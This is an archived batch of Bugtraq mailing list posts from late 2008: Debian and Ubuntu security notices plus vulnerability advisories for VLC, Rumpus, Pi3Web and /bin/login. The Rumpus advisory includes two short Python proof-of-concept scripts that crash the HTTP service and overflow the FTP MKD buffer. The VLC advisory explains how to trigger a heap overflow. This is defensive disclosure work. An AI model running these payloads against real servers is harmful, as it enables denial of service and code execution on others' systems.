tests=[BAYES_00=-2, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1674-1] New jailer packages fix denial of service
Priority: urgent
Resent-Message-ID: <35ECPNWT4_O.A.ssG.i_kMJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 30 Nov 2008 08:33:38 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1674-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 30, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : jailer
Vulnerability  : insecure temp file generation
Debian-specific: no
CVE Id(s)      : CVE-2008-5139
Debian Bug     : 410548

Javier Fernandez-Sanguino Pena discovered that updatejail, a component
of the chroot maintenance tool Jailer, creates a predictable temporary
file name, which may lead to local denial of service through a symlink
attack.

For the stable distribution (etch), this problem has been fixed in
version 0.4-9+etch1.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), this problem has been fixed in version 0.4-10.

We recommend that you upgrade your jailer package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/j/jailer/jailer_0.4-9+etch1.diff.gz
    Size/MD5 checksum:    27372 403ad34e153f4dbc14621b2bca464487
  http://security.debian.org/pool/updates/main/j/jailer/jailer_0.4.orig.tar.gz
    Size/MD5 checksum:    27920 a6bead6286022c54e73bfe1f51e5e5f3
  http://security.debian.org/pool/updates/main/j/jailer/jailer_0.4-9+etch1.dsc
    Size/MD5 checksum:      599 2a59c032c5da19b3443c0bd5c573a6e6

Architecture independent packages:

  http://security.debian.org/pool/updates/main/j/jailer/jailer_0.4-9+etch1_all.deb
    Size/MD5 checksum:    11688 8e042e660665df9b8657399ec3845cc8


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkyT30ACgkQXm3vHE4uylpr8gCg3xNNK/xK960IRO7sOmlfM3gt
s0EAoNpyEWbqDGg6ZvOvreDt2xIXqMQJ
=BKjD
-----END PGP SIGNATURE-----

From - Mon Dec  1 11:15:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bcd
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38781-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 16683EC10F
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:12:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E7714237050; Mon,  1 Dec 2008 08:36:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29542 invoked from network); 30 Nov 2008 13:11:01 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@aphrodite.kinkhorst.nl>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Greylist: delayed 1981 seconds by postgrey-1.27 at liszt; Sun, 30 Nov 2008 13:26:31 UTC
X-Virus-Scanned: Debian amavisd-new at aphrodite.kinkhorst.nl
From: Thijs Kinkhorst <thijs@debian.org>
Message-Id: <20081130125328.7D12A175D78@aphrodite.kinkhorst.nl>
Date: Sun, 30 Nov 2008 13:53:28 +0100 (CET)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-12.345 tagged_above=3.6 required=5.3
tests=[ALL_TRUSTED=-1.665, BAYES_00=-2, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1675-1] New phpmyadmin packages fix cross site scripting
Priority: urgent
Resent-Message-ID: <VnFJMwC0viJ.A.IkD.MSpMJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 30 Nov 2008 13:26:36 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1675-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
November 30, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : phpmyadmin
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-4326

Masako Oono discovered that phpMyAdmin, a web-based administration
interface for MySQL, insufficiently sanitises input allowing a
remote attacker to gather sensitive data through cross site scripting,
provided that the user uses the Internet Explorer web browser.

This update also fixes a regression introduced in DSA 1641, that
broke changing of the language and encoding in the login screen.

For the stable distribution (etch), these problems have been fixed in
version 4:2.9.1.1-9.

For the unstable distribution (sid), these problems have been fixed in
version 4:2.11.8.1-3.

We recommend that you upgrade your phpmyadmin package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-9.dsc
    Size/MD5 checksum:     1019 b751c9769e198e656e7b982ec8bc4fc9
  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz
    Size/MD5 checksum:  3500563 f598509b308bf96aee836eb2338f523c
  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-9.diff.gz
    Size/MD5 checksum:    54647 fee9d9989bd7e53fbe5f5308078cc68d

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-9_all.deb
    Size/MD5 checksum:  3602510 4148b6e9d9ee79457a9696cec5816259


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJMotXAAoJEGz0hbPcukPf0mEH/jFSWA+wBtZ70qv7ptNaMr5p
Ra6c4VK89qj4IO/ZLOj2+0ATFbsP8UAmaYr4SIuMAN5jSdz/1hysQheTx6nShAX9
gWBJy4nA43iijC0ASvgUeoyCqLMutxm6EenzJ3U4aZ+qmkOcbL/cXR89IG0+yPcq
fdShAjk8nj8ifm9RZAOZBswIsC+FvTL6qgiyNoSKUDVoidv0/UDl8zR4p2BzNpaj
gGeg9CFetBpGl3iyJlv6G4sFapul3txtWgPIefaPHDuevqwZTkCidQeRqC8/GG4J
xvDUEoE7YFuFOL6bWJYos84nALFtDeD8oj20vUMsrlf1jS2oJh6VRbAxdMzgAy8=UEZ6
-----END PGP SIGNATURE-----

From - Mon Dec  1 11:25:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bce
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-38782-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3967CEC112
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:22:31 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2D4D2237381; Mon,  1 Dec 2008 08:37:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30389 invoked from network); 30 Nov 2008 14:39:16 -0000
X-RZG-CLASS-ID: mo00
X-RZG-AUTH: :OGckYVKpa/RorD1n4vbkpyN1OrydUB3M3D078vRVBTvDAWjDwJ2Lrlwv
Message-ID: <4932A937.5070406@trapkit.de>
Date: Sun, 30 Nov 2008 15:54:47 +0100
From: Tobias Klein <tk@trapkit.de>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [TKADV2008-013] VLC media player RealMedia Processing Integer Overflow
 Vulnerability
Content-Type: multipart/mixed;
 boundary="------------000302020501020700000701"
Status:   

This is a multi-part message in MIME format.
--------------000302020501020700000701
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-013.txt

--------------000302020501020700000701
Content-Type: text/plain;
 name="TKADV2008-013.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="TKADV2008-013.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               VLC media player RealMedia Processing Integer 
                        Overflow Vulnerability
Advisory ID:            TKADV2008-013
Revision:               1.0              
Release Date:           2008/11/30
Last Modified:          2008/11/30 
Date Reported:          2008/11/14
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      VLC media player < 0.9.7
Remotely Exploitable:   Yes
Locally Exploitable:    No 
Vendor URL:             http://www.videolan.org/ 
Vendor Status:          Vendor has released an updated version
CVE-ID:                 CVE-2008-5276
Patch development time: 16 days


=====================Vulnerability Details: 
=====================
The VLC media player contains an integer overflow vulnerability while 
parsing malformed RealMedia (.rm) files. The vulnerability leads to a heap 
overflow that can be exploited by a (remote) attacker to execute arbitrary 
code in the context of VLC media player.


=================Technical Details:
=================
Source code file: modules\demux\real.c

[...]
891 static void ReadRealIndex( demux_t *p_demux )
892 {
...
900      uint32_t      i_index_count;
...
920 [1]  i_index_count = GetDWBE( &buffer[10] );
...
931 [2]  p_sys->p_index 932            (rm_index_t *)malloc( sizeof( rm_index_t ) * 
                                     (i_index_count+1) );
933      if( p_sys->p_index == NULL )
934          return;
935
936      memset(p_sys->p_index, 0, sizeof(rm_index_t) * (i_index_count+1));
937
938 [3]  for( i=0; i<i_index_count; i++ )
939      {
940         if( stream_Read( p_demux->s, buffer, 14 ) < 14 )
941             return ;
942
943 [7]     if( GetWBE( &buffer[0] ) != 0 )
944         {
945            msg_Dbg( p_demux, "Real Index: invaild version of index 
                                  entry %d ",
946                               GetWBE( &buffer[0] ) );
947            return;
948         }
949
950 [4]     p_sys->p_index[i].time_offset = GetDWBE( &buffer[2] );
951 [5]     p_sys->p_index[i].file_offset = GetDWBE( &buffer[6] );
952 [6]     p_sys->p_index[i].frame_index = GetDWBE( &buffer[10] );
953         msg_Dbg( p_demux, "Real Index: time %d file %d frame %d ",
954                        p_sys->p_index[i].time_offset,
955                        p_sys->p_index[i].file_offset,
956                        p_sys->p_index[i].frame_index );
957
958      }
959 }
[...]

[1] User supplied data from the RealMedia file gets copied into 
    "i_index_count".
[2] The value of "i_index_count" is used to calculate the size of a heap 
    buffer. If the value of "i_index_count" is big enough (e.g. 0x15555555)
    an integer overflow occurs while calculating the size of the heap 
    buffer. As a consequence it is possible to allocate a small heap buffer
    by supplying a big value for "i_index_count".
[3] The value of "i_index_count" is used as a counter in this for() loop. 
[4] User controlled data from the RealMedia file gets copied into the 
    previously allocated heap buffer (see [2]). As "i" is used as an array 
    index and the for() loop is executed until "i<i_index_count" it is 
    possible to overflow the heap buffer with user controlled data from the
    RealMedia file.
[5] See [4]
[6] See [4]

As there is also an exit condition that can be triggered to stop the 
overflow (see [7]) at any given point this leads to a fully controllable 
heap overflow that can be exploited by a (remote) attacker to execute 
arbitrary code in the context of VLC.


========Solution: 
========
  See "Workarounds" and "Solution" sections of the VideoLAN-SA-0811 [1].


=======History: 
=======
  2008/11/14 - Vendor notified
  2008/11/17 - Patch developed by VideoLAN team  
  2008/11/30 - Public disclosure of vulnerability details by the vendor
  2008/11/30 - Release date of this security advisory


=======Credits: 
=======
  Vulnerability found and advisory written by Tobias Klein.


==========References: 
==========
 [1] http://www.videolan.org/security/sa0811.html
 [2] http://git.videolan.org/?p=vlc.git;a=commitdiff;h�9de4e9f2211cbe5  
     bde00726b66c47a424f4e07
 [3] http://www.trapkit.de/advisories/TKADV2008-013.txt


=======Changes: 
=======
  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


==========Disclaimer:
==========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


=================PGP Signature Key: 
=================
  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2008 Tobias Klein. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG

iD8DBQFJMqeIkXxgcAIbhEERAhGVAJ9f9Z2xPdMKXxI0MGCa8Hw+5G0gOgCfcdLU
d+dOfuPDCxf+gLo6/Wy1wAg=Ve4L
-----END PGP SIGNATURE-----

--------------000302020501020700000701--

From - Mon Dec  1 11:35:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bcf
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38783-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 23234EC112
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:31:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8E27E23739C; Mon,  1 Dec 2008 08:38:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4701 invoked from network); 30 Nov 2008 19:35:48 -0000
From: Paul Szabo <psz@maths.usyd.edu.au>
X-smtpdoor-from: psz@maths.usyd.edu.au
X-smtpdoor-want-Message-ID: <200811301951.mAUJpBmR013125@bari.maths.usyd.edu.au>
Date: Mon, 1 Dec 2008 06:51:11 +1100
Message-Id: <200811301951.mAUJpBmR013125@bari.maths.usyd.edu.au>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: /bin/login gives root to group utmp
Status:   

There is a group-utmp-to-root privilege escalation vulnerability in
/bin/login in Debian, and I expect in all other Linux distros.
For details and exploit please see
 
  http://bugs.debian.org/505271
 
Currently am not aware of any group utmp issues (that could be
leveraged to get root).

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

From - Mon Dec  1 11:45:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bd1
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38784-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CC51DEC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:41:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D129B23739B; Mon,  1 Dec 2008 08:40:19 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25534 invoked from network); 30 Nov 2008 08:29:25 -0000
Date: 30 Nov 2008 08:39:26 -0000
Message-ID: <20081130083926.14213.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: het_ebadi@yahoo.com
To: bugtraq@securityfocus.com
Subject: Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability
Status:   

successfully tested.
http://secunia.com/Advisories/32696/
tested on last version :
note: Successful exploitation requires that Pi3Web is installed as a Desktop application.

From - Mon Dec  1 11:55:27 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bd2
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38785-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 30BB7EC10A
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:49:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 974AD2373DC; Mon,  1 Dec 2008 08:40:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16146 invoked from network); 1 Dec 2008 08:40:22 -0000
Date: Mon, 1 Dec 2008 01:43:27 -0700
Message-Id: <200812010843.mB18hR2H003611@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: zimpel@t-online.de
To: bugtraq@securityfocus.com
Subject: Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability
Status:   

See http://secunia.com/advisories/32696/:
The issue does only exist, when Pi3Web is installed  as an interactive desktop application. However it has not been reproduced on my test system until now.
There are a lot of information missing in the original report, which may have influence on the occurence of the issue:
- operating system name, version, service pack
- Pi3Web configuration (number of connections, thread reusage, connection keep alive, ...)
- test environment (application firewall, network components)

On the other hand it is conceptual question, whether an interactive desktop application may wait for user input, even if it is a server and if blocking of client requests during this time is to be evaluated as DoS. It has to be considered, that no hardened internet configuration has been used but an operation mode, which is or web development.

Please add at least the preference "Pi3Web must be installed as interactive desktop application" to this report because this is proved and is the common understanding of all involved people who are further analysing this issue.
--
regards,
Holger Zimmermann


From - Mon Dec  1 14:15:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bd4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38786-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 93CD9EC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 14:12:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7B850236F51; Mon,  1 Dec 2008 11:59:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28975 invoked from network); 1 Dec 2008 16:42:08 -0000
Date: Mon, 1 Dec 2008 23:56:19 +0700
From: Nam Nguyen <namn@bluemoon.com.vn>
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [BMSA 2008-09] Two buffer overflow vulnerabilities in Rumpus v6.0
Message-Id: <20081201235619.4633aff7.namn@bluemoon.com.vn>
Organization: Blue Moon Consulting Co., Ltd
X-Mailer: Sylpheed 2.5.0 (GTK+ 2.10.14; i686-pc-mingw32)
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature";
 micalg="PGP-SHA1";
 boundary="Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0OMyBpHHk"
Status:   

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0OMyBpHHk
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

BLUE MOON SECURITY ADVISORY 2008-09
===================================


:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1


Description
-----------

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary code execution under superuser privilege.

The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the lost of service.

The overflow in FTP component is also caused by the lack of length check when parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon could be allowing anonymous access.

Workaround
----------

There is no workaround the first bug.

Disable ANONYMOUS and only allow trusted users to use FTP.

Fix
---

Maxum has released Rumpus v6.0.1 which addressed these bugs.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  November 28, 2008: Initial contact sent to support@maxum.com

:Vendor response:

  November 28, 2008: John requested further communications to be sent to the same address.

:Further communication:

  November 28, 2008: Technical details and request for regular update of a patch sent to the vendor.

  November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01.

  December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html.

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

  from socket import socket, AF_INET, SOCK_STREAM

  host = "192.168.1.12"
  port = 80

  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.send('z' * 2908 + '\n\n')
  s.recv(1024)
  s.close()

For the vulnerability in FTP component::

  from socket import socket, AF_INET, SOCK_STREAM
  
  host = "192.168.1.12"
  port = 21
  user = "regular"
  pass_ = "training"
  
  commands = [
   'user regular\n',
   'pass training\n',
   'mkd ' + 'z' * 1046 + 'abcd\n'
  ]
  
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.recv(1024)
  for line in commands:
   s.send(line)
   s.recv(1024)
  s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0OMyBpHHk
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkk0FzMACgkQbKzcTD214ZfTpgCfbW7vSKOjWf/18jvwK6Y2Uwmd
zPAAoJX+CHQwr10VgangC7Hs3v7bug5H
=oAv3
-----END PGP SIGNATURE-----

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0OMyBpHHk--

From - Mon Dec  1 14:35:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bd5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38787-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BE47AEC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 14:26:31 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 26235236FC3; Mon,  1 Dec 2008 11:59:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29334 invoked from network); 1 Dec 2008 16:55:31 -0000
Subject: [USN-681-1] ImageMagick vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -13.7
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.172
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-drqv0m8JEzs8UbNvWH26"
Date: Mon, 01 Dec 2008 12:11:08 -0500
Message-Id: <1228151468.9860.3.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.1 
Status:   


--=-drqv0m8JEzs8UbNvWH26
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-681-1          December 01, 2008
imagemagick vulnerability
CVE-2008-1096
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

